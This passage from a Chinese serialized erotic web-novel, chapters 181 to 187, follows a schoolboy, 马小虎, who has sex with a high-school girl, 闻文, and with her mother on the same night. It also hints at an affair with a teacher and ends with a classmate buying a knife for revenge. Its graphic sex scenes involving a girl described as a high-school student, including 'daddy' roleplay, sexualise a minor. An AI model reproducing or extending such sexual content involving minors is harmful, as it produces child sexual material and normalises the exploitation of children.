闻文柔弱的呼吸弄的马小虎耳根直痒,他歪了下头,把手朝闻文的睡衣底部伸去。隔着纯棉的内裤,在她微微隆起的肉丘上轻轻抚摸,手指偶尔在花瓣间揉摸几下。
闻文紧紧搂着马小虎的脖子,身子微微的抖着,轻轻的呻吟着,说话都有些发颤,“老公爸爸,我好难受啊……”
说着她扭动着屁股,在马小虎的坚硬上用力的蹭着。
马小虎一边亲吻着闻文的脸颊,手就在闻文的大腿根处反复摩挲着,轻声问,“现在来啊?”
闻文马上摇头说,“不行,等我妈走的……”
两人正柔情蜜意着,就听李雪在外面喊说,“闻文,收拾桌子,吃饭啦……”
闻文马上从马小虎的怀里下来,摸着自己发热的脸说,“走吧,吃饭了……”
马小虎向自己的胯下指了指,“你看他……”
就见马小虎的裤子高高支起,像一个小帐篷一样。闻文捂着嘴呵呵乐着,用手在上面轻轻揉了揉,小声说,“等我妈走的,我帮你把他弄下去……”
李雪从两人的神态中就猜到刚才他们一定没干好事。她心里有些堵的慌,却又无可奈何。趁闻文不注意,她狠狠的瞪了李雪一样。
吃饭时,闻文假装随意的说,“妈,吃完我收拾厨房,你就打麻将去吧……”
李雪心里一阵苦涩,看来闻文是迷上这个混蛋马小虎了。她装作有些难受说,“我今天累了,不想玩儿。吃完你就写作业吧,你们作业不是挺多的吗?”
闻文失望的“哦”了一声,偷偷的看了马小虎一眼,用脚在饭桌下轻轻踢了他一下,意思是今天的事情要不行了。
马小虎却一脸的无所谓,他正暗自琢磨今晚怎么办呢。
吃过饭,马小虎和闻文刚进卧室,李雪就把两人喊了出来。她端着一盘水果放在茶几上,“你两吃点水果,小虎,你看电视吧,闻文,你吃完去写作业啊……”
说完她进厨房收拾去了。李雪今天能做的就是尽量别让闻文和马小虎单独在一起。
李雪一走,闻文就哭丧着脸看着马小虎,轻声说,“完了,咱们两被监视了……”
马小虎嘿嘿一笑,小声说,“没事儿,晚上你别锁门,我到时候偷偷过去……”
闻文忙摇着头,“不行,要是被抓住就死定了。”
马小虎一脸无所谓的说,“没事,你就信我的吧。”
闻文还是摇了摇头。
李雪收拾完,见两人还挺老实的坐在沙发上,她也坐到旁边问说,“闻文,你不写作业啊?”
闻文嘟囔句,我刚歇一会儿就让我写作业。嘴里虽然这么说,但还是回卧室写作业去了。
闻文一进屋,马小虎就朝李雪靠了过去。紧挨着她,李雪忙皱着眉小声说,“别挨着我,上那边坐着……”
她话音一落,马小虎就把手放到她的大腿上,来回摩挲。李雪瞪了马小虎一眼,也不再动弹。
马小虎在大腿上摸了一会儿,又摸向李雪丰满的乳房。同时把她的手拽到自己的两腿间。李雪也没反抗,隔着裤子轻轻按摸着。
马小虎已经不满足这样隔着衣服,他伸手要解开自己的腰带。李雪吓了一跳,忙小声说,“你等下,我看看闻文那屋门关了吗?”
李雪见闻文房间门关的严严的,她又回到马小虎的身边。暗想就是闻文忽然出来,马小虎也能弄好裤子。她才把马小虎的拉链解开,裤子朝下微微褪些,黑粗的家伙一下露出了晶亮的小脑瓜。
李雪用手握住坚硬,立刻感觉手心上热乎乎的,坚硬的血管还微微抖动着。她脸色微红,内心被这种偷情的感觉刺激的砰砰狂跳,尤其女儿还在房间,她心跳的就更快了。
李雪用大拇指轻轻摁在圆头的小嘴上,手指肚沿着光头的四周画着小圈。她微微套弄几下,也没用马小虎要求,就侧身低下头,伸出舌尖在圆头上面轻轻舔了几下,又张嘴慢慢含住,开始慢慢吞吐着。
马小虎低头看着李雪的头部在自己的胯间一上一下的动着,他手摸着她的头发,心里有一种无可言状的快感,甚至希望闻文能出来看看这一幕。
好半天,李雪才抬起头,她靠在马小虎的肩上,嘴里轻喘着,“不行了,嘴酸了……”
她说着话,但手却还在坚硬上套弄着。
马小虎嘿嘿笑着,手在李雪的大腿上乱摸,“要不现在来啊?”
李雪瞪了他一眼,“胡闹呢,闻文还没睡呢……”
马小虎一脸坏笑的说,“要不我去给她哄睡了吧?”
李雪轻轻的在坚硬上掐了下,“滚,你两刚才在房间里都干什么了?”
马小虎故意气李雪,指着坚硬说,“没干什么啊,就亲了几下这里……”
李雪气的瞪了他一眼,手上一加力,握的马小虎“啊”的一声叫了出来。 03-28
第一百八十二章 母女同室(二)
马小虎这一叫,房间里的闻文也听到了,她忙在房间里问,“小虎,你怎么了?”
马小虎忙把裤子拽上。李雪也吓的忙大声说,“没事,他踢茶几上了,你写作业吧……”
李雪说完狠狠瞪了马小虎一眼。马小虎系好裤子,靠在李雪身边问说,“我去先把闻文哄睡了吧……”
李雪忙皱着眉头摇摇头,“不行,咱们都说好了的,她上大学前你不许骚扰她……”
马小虎一手放到李雪的乳房上,用力揉着。李雪也不躲,但还是不同意。马小虎一脸坏笑的解释说,“闻文她也想呢,就这样她也学不进去啊……”
马小虎一边说着,一边用力的在李雪的乳房上揉搓着。李雪不由的哼了一声。
她一下把马小虎的手打掉,瞪了他一眼,“你看电视吧,我睡觉去了……”
说着转身回了房间。李雪也实在没有办法了,知道靠自己硬监视着根本也没用。两人说不定什么时候就偷摸搞到一起了。她也不想痛快就答应了,唯一的办法就是选择沉默。乡土尛说網手打马小虎见李雪一回房间,他就溜到闻文的屋里。闻文见他进来,冲他甜蜜一笑,“不看电视啦?”
马小虎上前横腰把闻文抱起,放到床上。闻文吓的忙低声说,“不行啊,我妈在外面呢……”
马小虎嘿嘿一笑,“没事儿,她睡觉了……”
闻文虽然想,但心里还是害怕。马小虎一趴到她身上,她就紧张的说,“不行,万一她进来呢……”
马小虎两手把闻文睡衣掀了起来,就要往下脱,嘴里说,“放心吧,肯定不会来的……”
闻文还是害怕,她商量说,“衣服还是别脱了……”
马小虎一想也行,他就把白色的小内裤拽了下来。闻文紧张的喘息着,心里既担心又期待。
马小虎几下就把自己脱的溜光,闻文吓的赶紧扯过被子说,“你快进被窝,这要是被我妈看到,她得杀了我……”
马小虎却不肯,他跪在闻文的身边,来亲亲。闻文虽然紧张的要命,但一看到她朝思暮想的坚硬,还是毫不犹豫的亲了上去。闻文并不喜欢用嘴,但她知道,马小虎喜欢,她也就顺着他的意思。
闻文的口技很普通,就是正常含着,偶尔会用舌头舔舔。但马小虎却觉得十分刺激,主要是刚才李雪在客厅帮自己舔过,现在闻文又舔,心里的满足感自是无以言表。
马小虎一边低头看着,一边把手伸到闻文的花瓣间,在粉嫩的花瓣上轻轻揉着。闻文嘴里含着坚硬,嗓间低声闷哼几下。这种紧张感和花瓣间的刺激让她感觉有些窒息,她忙把坚硬吐出,大口的喘着粗气。
李雪躺在被窝里,她闭着眼睛,可是没有一点睡意。她虽然听不见,但也知道马小虎和闻文此时正在做什么。一时间心里七上八下、乱七八糟的。
李雪安慰自己,女孩子早晚都会有这一天的。马小虎虽然混蛋点儿,但人也不错。他要是真和闻文成了,也能说的过去。只是自己和他这种关系以后却不知该如何相处。
李雪脑子里胡乱的想着,一想到此时马小虎的坚硬正在女儿的身体里进出,她不由的紧紧并起双腿。一只手用力的揉着自己的乳房,抿着嘴,鼻孔里发出一阵轻哼。
她把手伸到内裤里,用手指在花瓣上快速的来回抚摸着。她忽然绷直大腿,一根手指慢慢插到自己的花瓣中,嘴里发出颤抖的呻吟。眼前全是马小虎的影子,还有他那粗长的坚硬。
李雪的手指在花瓣间快速的动着,但她感觉还是有些空虚,慢慢的又伸进了一根。在里面慢慢寻找肉粒,来回的揉摸着。
闻文把坚硬从嘴里吐出,满脸绯红的看着马小虎,“小虎,快来吧,我害怕……”
马小虎就扛起闻文的双腿,一手扶着坚硬,对准花心,他看着身下的闻文,“我要进来了?”
闻文忙说,“等一下……”
就见她把被子拽到身前,她怕自己一会儿忍不住,就咬住被子的一角,娇羞的冲马小虎点点头,“进来吧……”
马小虎挺着屁股猛的就往里一插,闻文还是没忍住,她紧要着被角哼了一声,她意识到自己发出了声音,忙又把嘴紧紧闭上。
马小虎继续用力,坚硬就齐根没入。闻文虽然感觉有些疼,但她还是咬牙忍住了,更何况酥麻的感觉已经完全超过了疼的感觉。
马小虎开始慢慢抽动着,他低头看着自己的坚硬在花瓣之间来回进出。闻文粉嫩的花瓣一开一合。盛开时整个花心翻向外,里面沾满爱液的肉壁都会跟着露出来。
马小虎越动越快,闻文的呻吟声也越来越急,但她还是咬着被角拼命的忍着,两条玉腿在马小虎的肩上来回蹭着。
马小虎也想速战速决,他心里还惦记着那房间的李雪。他一边动一边用手在闻文的乳房上揉着,低声问说,“闻文,你说你妈能不能听见?”
闻文闭着眼睛摇摇头。
马小虎一边揉着乳房一边说,“为什么你妈的胸比你大这么多?”
闻文把被角拿出,喘着粗气说,“你怎么烦人呢?”
马小虎就用力动了两下,闻文忙又把嘴紧紧闭上。马小虎看着闻文,“快,叫爸爸……”
闻文嗯了下,低声喊说,“老公爸爸……”
马小虎边动边说,“爸爸想去摸你妈妈的大乳房,行不行?”
闻文用腿在他脑袋上踢了下,喘着粗气断断续续的说,“你去吧……看她不,打死你的……”
马小虎心里暗想,她还打死我,说不定现在都急死了呢。马小虎开始加快抽插速度,一下一下的朝花心深处顶去。

第一百八十三章 母女同室(三)
闻文闭着眼睛,双腮粉红,鼻尖上有一层薄薄的汗珠,鼻孔里不时发出低声的闷哼,一头长发散落在床上。乡土尛说網手打她忽然感觉下身有些痉挛,两条玉腿不由的在马小虎的肩上抻直。脚趾用力的朝脚掌回缩着,嗓眼里发出一声哼叫。但她还是用残存的理智咬紧被角,怕自己忍不住喊了出来。
马小虎看着身下闻文的媚态,知道她这是要来了,忙快速抽送着,忽然感觉坚硬被一股热流冲击下,马小虎险些没控制住,差点也射了出来。
闻文瘫软在床上,媚眼如丝的看着马小虎,小按摩中出嘴微微张着,“你还没出来呢吧?”
马小虎点点头。闻文就催促说,“那快点吧,我还是有点害怕……”
马小虎动了几下,见闻文始终是紧张兮兮的。他就把坚硬拔出,闻文以为他要换姿势,正等着他摆布呢。谁知马小虎躺在她的身边,“我不用出来了,今天就是让你满足……”
闻文在他额头上亲下,“那你不难受吗?”
马小虎嘿嘿一笑,一手在闻文的乳房上摸着,“我没事儿,但我还想去摸你妈的大胸。”
闻文只当他是闹着玩,也没当回事,“我妈的是比我大不少,不过她都多大岁数了,我才多大啊,以后还会长呢,现在是不是就比以前大不少……”
闻文说着自己也低头看。马小虎点点头,“是大了不少……”
闻文坐了起来,开始整理自己的下身。她拿纸巾想帮马小虎擦,马小虎却躲开说不用。闻文有点奇怪的看着他,他嘿嘿笑说,“我就带着你的液体睡觉,这样睡的香……”
闻文哪知道他脑子里想的说什么,皱着眉头说,“我真搞不懂你整天想的是什么……”
马小虎也坐起来,但他只把内裤穿好。闻文看着他说,“你回去睡觉吧?明天我妈要是不在家,我帮你弄出来好不好?”
马小虎点点头,问说,“你还学习?”
闻文摇摇头,“不了,我累了,现在就睡。”
马小虎就等她这句话呢,他拿着衣裤在闻文脸上亲了下,就蹑手蹑脚的去了客卧。
挺了一会儿,他偷偷把门打开,见闻文的房间关灯了。他小心翼翼的出来,偷偷的进了李雪的房间。
闻文好像也听到了李雪房门开了下,她甚至怀疑可能是马小虎真去了妈妈的房间。但她又觉得不太可能,就闭着眼睛继续睡觉。
李雪的房间床头灯还开着,昏黄的灯光下,李雪正蜷着身子侧躺着。她其实没睡着,马小虎进来她听的清清楚楚。
马小虎悄悄的爬上床,一抬头就看见床头上挂着李雪和闻成钢的结婚照。照片中,闻成钢正一脸微笑的看着他。马小虎对着照片嘿嘿一乐,钻进了被窝,从后面搂住李雪。
李雪内心狂跳,暗想自己这是怎么了。他刚和自己女儿做完,现在又上了自己的床,自己却一点都不觉得羞耻。
马小虎用坚硬在李雪的屁股上顶了两下,手伸到前面在她硕大的乳房上捏了捏。他摸李雪的乳房时就敢用力,李雪也从来不说疼。但闻文就不行,他只要力气大点,她就嚷着疼。马小虎就想,这可能是跟大小有关吧。
李雪些奇怪,马小虎刚和女儿做完,怎么这么快又硬了呢?
马小虎见李雪不动,就把她身子扳正。李雪这才睁开眼睛看着马小虎,轻声说,“干什么,还没够啊?”
马小虎嘿嘿笑着,“这么舒服的事儿哪能有够呢……”
说着他就去脱李雪的睡衣,李雪在他手上打了下,瞪他一眼,“我自己来……”
说着把睡衣脱了,内裤也直接脱掉。还帮着马小虎也脱了内裤。马小虎跪在李雪的脑袋前面,把坚硬凑过去,嘟囔说,“来,亲亲……”
熟妇和女孩儿的区别就在这儿,熟妇会觉得在床上一切都是正常的。但女孩儿没接触过的东西,一般都会有些害羞和推搡。
坚硬一到嘴边,李雪毫不犹豫的就拿起含住,她感觉嘴里有些发咸,就猜到是怎么回事了。她在马小虎的屁股上掐了下,吐出坚硬问说,“刚才是不是没擦……”
马小虎坏笑,也不说话。拿着坚硬在李雪嘴唇上杵着。李雪瞪了他一眼,还是把坚硬含在嘴里,开始用力吞吐。
好一会儿,李雪才把坚硬拿出来,她把腿劈开说,“快点上来吧……”
马小虎就趴了上去,两手支在李雪的身体两侧。李雪主动扶着坚硬对准自己的花瓣。马小虎挺着屁股,滋溜一下,坚硬就滑入李雪的花心中。
马小虎一边动一边轻声问说,“刚才我和闻文在那屋做,你能听见吗?”
李雪喘息着说,“听不见……”
马小虎用力挺动几下才说,“闻文是故意憋着的,咬被子才没出声的……”
李雪呻吟两声,忽然担心的问说,“你刚才没射她里面吧?可千万做好避孕啊……”
马小虎也喘着粗气说,“嗯,我根本就没射,都给你留着呢……”
李雪这才放心,但她还是忍不住问说,“闻文来了吗?”
马小虎自豪的说,“我的小弟弟这么厉害,怎么能不让她来高潮呢……”
李雪闭着眼睛娇喘着,幻想闻文在马小虎的身下来高潮的情景。她这么一想,就感觉自己的欲望一下强烈很多,不由的抱着马小虎的屁股,用力的朝自己推着。
马小虎一边抽动着,一边抬头看着床头的照片。李雪开始闭着眼睛,一睁眼看到马小虎坏笑的看着照片,心里知道这坏小子再想什么。就在他屁股上拍了下,“看什么呢,媳妇和女儿都让你睡了你还好意思看……”
马小虎嘿嘿一笑,低下头在李雪的嘴上亲吻着,下身依旧一下下的挺动着。
1加载中

第一百八十四章 被迫同意
李雪见马小虎迟迟没有要射的意思,她就轻轻在他屁股上拍了拍,“要不我上来吧……”
马小虎一听就把坚硬退出,躺在床上说,“我还真有点累了,你来吧……”
李雪斜坐在床上,两腿压在屁股底下。她把一头波浪的卷发捋到脑后,底下头含住马小虎的坚硬,用力的上下吞吐几下。
又慢慢起身,扶着坚硬一点点坐了下去。马小虎就盯着自己的坚硬在李雪的两股之间慢慢插入。
整根坚硬都进入时,李雪轻呼了一口气。她两腿放在马小虎的身体两侧,微微蹲起。手摁着马小虎的前胸,撅着屁股一上一下的动着。
马小虎舒服的倒吸冷气,他两手抓着李雪硕大的乳房,嘴里嘟囔说,“太爽了,哪天你教教闻文吧……”
李雪瞪了他一眼,两腿由蹲改跪,身体前推着,用花心中的肉壁挤蹭着坚硬。
马小虎就感觉坚硬圆头被挤压的一阵阵麻酥,他抓着乳房说,“哎呀,太爽了,我要忍不住了……”
李雪两手还放在他的胸前,低声呻吟说,“我也要来了,一起吧……”
马小虎点点头。李雪就抬起屁股上下快速动着,屁股一下下撞击着马小虎的胯部。马小虎忽然感觉头皮一麻,坚硬开始一下下的跳动,圆头也张开了小嘴,一股股精华喷射而出。
李雪感觉花心被一股热浪冲击,她身子一颤,花瓣就开始收缩。两手紧紧攥着马小虎的胳膊,用力的捏着,好半天才发出一声低沉的“哦啊”声。她这是强忍着没让自己喊出来。
好半天,李雪才缓过来,她慢慢的把坚硬退出。拿了几张纸巾开始清理自己的下部,同时低头含住马小虎的下身,用嘴帮他清理。马小虎又指了指大腿根处,原来刚才爱液已经流到了大腿上。李雪没再用嘴,拿着纸巾帮他擦了。
马小虎搂着李雪,李雪的手还放在马小虎的下身,轻声说,“行了,回去睡觉吧……”
马小虎耍赖,想在她房间住,李雪死活不肯,硬是把他撵下了床。
马小虎回到客卧,躺下不一会儿就呼呼大睡。他睡的正香,就感觉有人上了他的床。他第一感觉是李雪,可当一只小手搂过来时,他觉得不对,迷迷糊糊的回头,就见闻文正对他笑呢。闻文是半夜起夜,就想过来看看他。
闻文看着马小虎迷瞪的样子,小声问说,“睡的香吗?”
乡土尛说網手打马小虎实在太困,又闭上眼睛,一条大腿压在闻文身上,手也搂了过去,嘟囔说,“来,爸爸搂你睡……”
闻文呵呵傻笑,一只手伸到马小虎的内裤里摸着他的下身。坚硬早就耷拉着脑袋。
两人腻了一会儿,闻文轻声说,“你睡吧,我就过来看看你。我回去啦……”
闻文刚要下床,卧室门一下开了。吓的她赶紧一下坐了起来。马小虎却没当回事,依旧躺在那,瞪着眼睛看。
李雪根本不知道闻文来客卧了。她也是起夜过来随便看一眼,哪想到闻文正躺床上呢。她把灯打开,看着闻文说,“闻文,你出来,我有话跟你说……”
闻文回头看了马小虎一眼,撅嘴跟着李雪出了房间。李雪虽然知道她和马小虎的事情,但让她撞到了,她自然不能不管。她想正好也趁机教训闻文一番。
李雪看着闻文,厉声说,“你半夜不睡觉去小虎房间干什么?”
闻文从小到大被闻成钢夫妇视为掌上明珠,别说打骂,就是大声训斥都很少见。她今天一听李雪的口气,心里有些接受不了,暗想自己和马小虎的事情早晚都得让家人知道。想到这里,她就撅嘴赌气说,“不干什么,我就看他睡没睡呢……”
李雪见闻文一点悔改的意思都没有,一时生气,声调就提高不少,“你是个女孩儿你知道不知道?女孩子要懂得自重……”
闻文一听“自重”这个词,马上就急了,她犟嘴说,“我怎么不自重了?我就是喜欢他怎么了?我告诉你,我和马小虎早就那什么了……”
李雪被气的脑袋嗡了一下,她没想到闻文居然敢这么和她说。李雪举起手,想上去给她一个耳光,谁知闻文竟把脸朝她凑去,“你打吧,打死我吧……”
李雪看着自己从小宠惯的女儿,还是没舍得下手。但闻文却不依不饶,问说,“你要是不打我可走了,我再也不回来了……”
李雪吓的瞪眼看着她,“你要去哪儿?”
闻文撅着嘴说,“我去吴阿姨家,吴阿姨对我最好了……”
李雪气的浑身直哆嗦,但她知道闻文从小就犟,她还真能干出这事儿来。心想都是被自己和老公给宠坏了。她怕闻文真一生气走了,闻成钢回来她没法交代,就换个态度和她说,“闻文,妈不是不让你和小虎在一起,只是你们现在还小。你要以学习为重,你们的事情怎么也得到大学了再说啊……”
闻文见李雪的态度转变了,她也不想惹李雪生气。就过去拉着李雪的胳膊,哄着李雪说,“妈,我知道,我学习一直也没落下啊,现在还是年级前十啊,我不会因为和小虎在一起耽误学习的……”
李雪无奈的叹了口气,她看着女儿,“今晚你和妈睡,妈有些话和你好好说说……”
母女俩聊了很晚,李雪无非就是从女人的角度告诉女儿,有些事情该怎么办,如何保护自己。闻文虽然觉得李雪有些啰嗦,但见她已经同意自己和小虎来往,也就认真听着了。
闻文一直搂着妈妈的腰,手无意间碰到了李雪的乳房,她忽然噗嗤一笑。李雪有些奇怪的问,“你笑什么?”

第一百八十五章 三个女人
闻文有些不好意思的说,“小虎说你胸大,他一直想摸呢……”
李雪被闻文的话弄的哭笑不得,低头看着闻文,“闻文,你说你这孩子是不是傻啊?”
马小虎没想到闻文居然成功的劝服了李雪。他暗自窃喜,说不定哪天真能和母女同床呢。
这段时间班级同学都特别的忙,都在为元旦联欢会做准备。就连耗子、四眼、包知道和杨达壮都排了个三句半,唯独马小虎无所事事,关键他唱歌跑调,别的更不会什么。如果有骂人打架的节目他倒是能表演一个。
元旦前一天,班级同学就跟打了鸡血一样,班级里闹哄哄的。有排练节目的,有布置班级的。这回马小虎还有点用,他个子高,就帮着挂个气球、扯个条幅之类的。
他刚把最后一个气球挂好,口袋里的手机就响了。拿出一看是韩梅,他就拿着电话出门去接。
韩梅告诉他她同学回来了,几个人准备明天聚会,让他准备一下。马小虎说明天班级联欢。韩梅就说,反正你也没节目,就和老师请个假吧。中午再陪我出去一趟。马小虎问她去干什么,韩梅也没说。
韩梅的做事风格就是要么不做,要么就做好。就拿她和马小虎来说,她虽然不敢公开承认两人的关系,但在她心里,她一直把马小虎当成自己的男友。乡土尛说網手打中午时,韩梅带马小虎去了商场,给他换了一身衣服。去带他去理了发,特意给他往成熟上打扮。
看着马小虎的新造型,韩梅还比较满意,两人又去找了家面馆吃午饭。马小虎哧溜哧溜的大口吃着,韩梅就看着他说,“你小点口,吃饭别出声……”
马小虎不服的说,“吃面条要是不出声的话,就像在床上不让你叫一样,你能受得了啊?”
幸亏马小虎声音不大,旁边没人听见。就是这样韩梅脸也红了,她拿筷子在马小虎手上打了下,“你能不能别胡说?”
马小虎撇着嘴,也不管韩梅,还是和刚才一个吃相。没一会儿,一大碗面条就被他吃光,韩梅碗里还剩一大半呢。
马小虎一边擦嘴,一边问韩梅,“你是不是怕我明天去给你丢人啊?又买衣服又剪头的?”
韩梅倒不是怕他丢人,主要是他精神帅气自己也有面子。她怕马小虎多想,就撒谎说,“没有,这不是过年了吗?给你换个新造型……”
马小虎盯着韩梅,“那你说咱两在床上是不是也换个新姿势呢?”
马小虎的话让韩梅一口面条险些喷出来,她咬着牙看着马小虎,“你要是再敢胡说,我现在就打你满地找牙……”
马小虎一听韩梅说要动手,忙把嘴闭上。
韩梅慢慢吃着,马小虎就在面馆里左顾右盼的,他忽然看见一个熟悉的身影,忙把头低了下来,但眼睛还溜溜的转着看。
韩梅见他不对,就轻声问他,“怎么了?”
马小虎做了一个嘘声的手势,悄声说,“我看见郑前程他女朋友了……”
韩梅也吓了一跳,她也不想被别人看见。马小虎又神神秘秘的说,“她不是和郑前程在一起,和另外一个男的,还挺亲密呢……”
韩梅也认识赵妍菲,她忙小声说,“咱俩走吧,我可不想看见她……”
说着两人头也不回的走了。
赵妍菲无意间抬头,看着韩梅和马小虎的背影,嘴里自言自语的说,“怎么好像是韩梅呢……”
她对面的男人也回了下头,轻声问,“韩梅是谁啊?”
赵妍菲白了他一眼,“谁你也不认识,快点吃,吃完我还有事呢……”
这男的嘿嘿一笑,脸往前凑说,“我刚才表现还行吧?”
赵妍菲似笑非笑的说,“还凑合吧……”
韩梅初中时最好的两个朋友,一个叫程安妮,另一个叫丁雅婷。但三人上了大学后基本就断了联系。这次程安妮过年回家,费了不少劲联系到她们两,三人约好在一家火锅店见面。
韩梅和马小虎到时,她们两人已经等了一会儿。三个女人一见面自然叽叽喳喳、又搂又抱的。
好不容易安静下来,程安妮看着韩梅身边的马小虎说,“韩梅,你还真领了个小帅哥啊……”
韩梅大大方方的介绍说,“这是我干弟弟,也是我学生……”
程安妮长的很白,但有些胖,长相也很普通。但却很敢说话,她和马小虎握手说,“是干(一声)弟弟还是干(四声)弟弟啊?”
她话音一落,房间里的几人都哈哈大笑。马小虎也是一脸无所谓的跟着傻笑。
韩梅在程安妮身上轻打了下,“你这在外企的就是不一样,什么话都敢说。”
丁雅婷看着马小虎,皱着眉头想想说,“你是不是叫马小虎?”
刚才丁雅婷一直背对着马小虎,马小虎也没看清。她这一问,马小虎仔细一看,一下呆住了,这个丁雅婷就是上次在派出所打他一巴掌的女警。
马小虎张大了嘴,看着丁雅婷,“警察姐姐?”
丁雅婷一听哈哈大笑,她外套已经脱了,只穿着淡蓝色的警用衬衫。这一笑,胸前的丰满也跟着一颤一颤的,她看着韩梅说,“原来这个小混蛋是你干弟弟啊,也怪不得你能认他当弟弟。他油嘴滑舌的,说话才贫呢……”
韩梅楞了下,问说,“你们认识?”
丁雅婷笑笑说,“岂止认识呢……”
说着就把那天在派出所的事情讲了一遍。
韩梅听完就懊悔的说,“我一直以为你在乡镇的派出所呢,哪知道你调回来了,要不就去找你了……”
丁雅婷一双大眼睛忽闪着,“可不是吗?要是知道是你弟弟,他在里面也不能挨打啊……”

第一百八十六章 耗子偷情
几人说着话,程安妮把自己的男友给两人介绍下,是她大学的同学。丁雅婷已经结婚了,丈夫叫罗胜,是市里主抓政法领导的秘书。他带着一副眼镜,看着有些瘦弱,还挺斯文的,但骨子里却有着一种说不出的傲慢。
程安妮特意点了白酒,她说吃川味火锅必须配上白酒才过瘾。她给韩梅和丁雅婷倒上,也不管三个男的喝不喝。端起酒杯就和两人喝上了。
韩梅这是第一次喝白酒,刚喝两口,脸就微微泛红,整个人更显妩媚。程安妮和丁雅婷喝酒却不上脸,但丁雅婷一和她两碰杯时,胸前丰满的乳房就颤几下,马小虎在旁边一直偷看着。
三人聊的无非是上学时候的趣事,外加现在的工作近况。几个男人也插不上嘴,就闷闷的吃着。
刚吃不一会儿,罗胜的手机就响了,他接完对丁雅婷说,“雅婷,我得走了,领导找我有事……”
丁雅婷有些不满,嘟囔说,“一和我出来你就有事……”
但她也知道秘书的时间根本就不归自己,还是让他走了。
丁雅婷和马小虎之间本来隔着罗胜。罗胜一走,她就把中间的椅子挪走,重新一坐下,脚尖无意当中碰到了马小虎的脚。
丁雅婷没想到,她刚把脚收回去,马小虎居然用脚轻轻回踢了她一下。丁雅婷又轻轻的踢了回去,马小虎竟又踢了回来。
丁雅婷暗想,马小虎这小子油腔滑调的,这是故意在挑逗自己呢。看来他和韩梅的关系绝对不简单。她心里想着,就想让马小虎吃点苦头。她这回不踢马小虎的鞋了,而是照着马小虎的小腿就是一脚。
丁雅婷认准了马小虎不会吭声。实际她根本不了解马小虎,马小虎踢她和调戏无关,他就觉得你碰我一下,我就碰你一下,这样咱们就两不相干。
马小虎小腿上挨了一脚,还挺疼。他马上就不干了,看着丁雅婷问说,“你踢我干什么?”
马小虎这一问,桌上所有人的目光都集中在丁雅婷身上。丁雅婷脸腾的一下红了,忙解释说,“我不是故意的……”
韩梅用奇怪的眼神看着丁雅婷,丁雅婷心里就暗恨马小虎。谁知马小虎还嘟囔说,“还不是故意的,都踢我好几下了……”
丁雅婷一听,恨的她牙根直痒,真想上去给他两个耳光。
程安妮在一旁笑着对马小虎说,“这是你雅婷姐姐喜欢你呢,这么不解风情呢,到底还是小啊……”
乡土尛说網手打丁雅婷一听脸更红了,韩梅听了就有些不高兴,但还是装出笑脸说马小虎,“也不是故意碰的,你怎么这么多事儿呢……”
马小虎刚想犟嘴,就看韩梅眼光中有杀意,他忙把嘴闭上了。程安妮在一旁“哧哧”笑说,“你这小弟弟太可爱了……”
几人吃过饭,三个女人嚷着要去唱歌。马小虎不想去,韩梅也没为难他,就让他先回学校。临走时,居然还当着大家的面和他抱了下。
马小虎一走,丁雅婷就逼问韩梅,“你说实话,你和这马小虎到底什么关系?”
韩梅喝的有些微醺,呵呵笑着,“就是弟弟啊,没什么关系的……”
程安妮插嘴说,“是下面那个弟弟吧?你现在是老牛吃嫩草啊,典型的祸害青苗呢……”
说着又去都丁雅婷,“你是不是看上这小孩儿了?和韩梅说说,借你玩几天。看你老公那干巴样,肯定满足不了你……”
丁雅婷笑着追她说,“就你老公能满足你,我看你都快把他榨干了……”
几个女人嬉闹着,程安妮的老公在一旁尴尬的笑着,也不插话。
马小虎回到学校时,联欢会早结束了。因为是元旦,学校放了假。很多同学开完联欢会就跑出去AA制聚餐,整个校园里闹哄哄的。
马小虎到了寝室门口,一拽门,发现门里居然是反锁着的。他又一拽,就听耗子在里面说,“谁啊,等会儿……”
一开门,马小虎就见耗子的同桌小胖妞儿脸色潮红的坐在床上,低着头不敢看马小虎。
耗子担心马小虎胡说,小胖妞再不高兴。就忙对着马小虎嘿嘿一笑,问说,“你今天去哪儿了,联欢会你也不参加……”
马小虎根本就没听耗子问什么,他反问耗子,“你两刚才干什么呢?到哪一步了?快说……”
小胖妞被他的话弄的脸更红了,头都快低到胸前。耗子笑着对马小虎打了下,“滚蛋,你在寝室呆着吧,我俩走了……”
马小虎忙说,“你别走啊,我给你们倒地方,我走……”
耗子一边穿衣服一边摇头,回头朝马小虎挤着眼睛说,“不用,完事了……”
马小虎哈哈一笑,随口问,“他们呢?”
耗子回答说,“喝酒去了,瓶底子也在,我偷着跑出来的……”
马小虎有些惊讶,“瓶底子还会喝酒?我以为他除了教学别的什么都不会呢……”
耗子和小胖妞走后,马小虎就躺在床上睡大觉。也不知道睡到几点,就听寝室门哐当一下开了。四眼和杨达壮几人急匆匆的冲了进来,上去推着马小虎,“小虎,快起来,出事了,耗子出事了……”
马小虎迷迷糊糊的坐了起来,揉着眼睛问说,“怎么了?出什么事了?”
四眼忙说,“耗子给老黑捅了,老黑刚让120拉走,现在是死是活还不知道呢……”
马小虎一听,惊讶的站了起来,“那耗子呢?”
四眼摇头说,“跑了,不知道去哪儿了……”
马小虎追问,“到底怎么回事?”
四眼指着正哭哭啼啼的小胖妞,“你说,你把怎么回事告诉小虎……”

第一百八十七章 刀刀致命
小胖妞一边哭着,一边把事情经过讲了出来。乡土尛说網手打她和耗子出了校门,准备去游戏厅。可没走多远就看见肖凯和老黑一群人。耗子一见他们就知道不好,他拉住小胖妞准备绕道走。谁知肖凯也看见他了,离挺远就喊说,“耗崽子,领个荷兰猪乱跑什么?”
如果肖凯只是骂耗子,他也就不能回骂,毕竟好汉不吃眼前亏。但肖凯骂的是小胖妞,耗子就不干了,他回骂说,“操你妈肖凯,你他妈才是猪,你们全家都是猪……”
小胖妞有些害怕,她想把耗子拉走。老黑快步走了过来,伸手就要打耗子。小胖妞忙挡在耗子身前,谁知老黑一脚把小胖妞踹倒。
耗子见胖妞倒在地上,一下急了,他一边骂着一边朝老黑冲去。还没等到跟前,就被几人打倒在地。老黑一边踹耗子一边说,“操你妈的,这就是你跟着马小虎混的下场……”
小胖妞爬起来,想去把他们拉开。老黑回头又给了她一脚,直接踢在她的肚子上。小胖妞疼的躺在地上直翻滚,再没爬起来。
老黑他们打完耗子,也没当回事,一群人去了附近的网吧。耗子起来后,他先把小胖妞扶了起来,就直接跑到附近一家商店,买了一把剔骨用的尖刀。
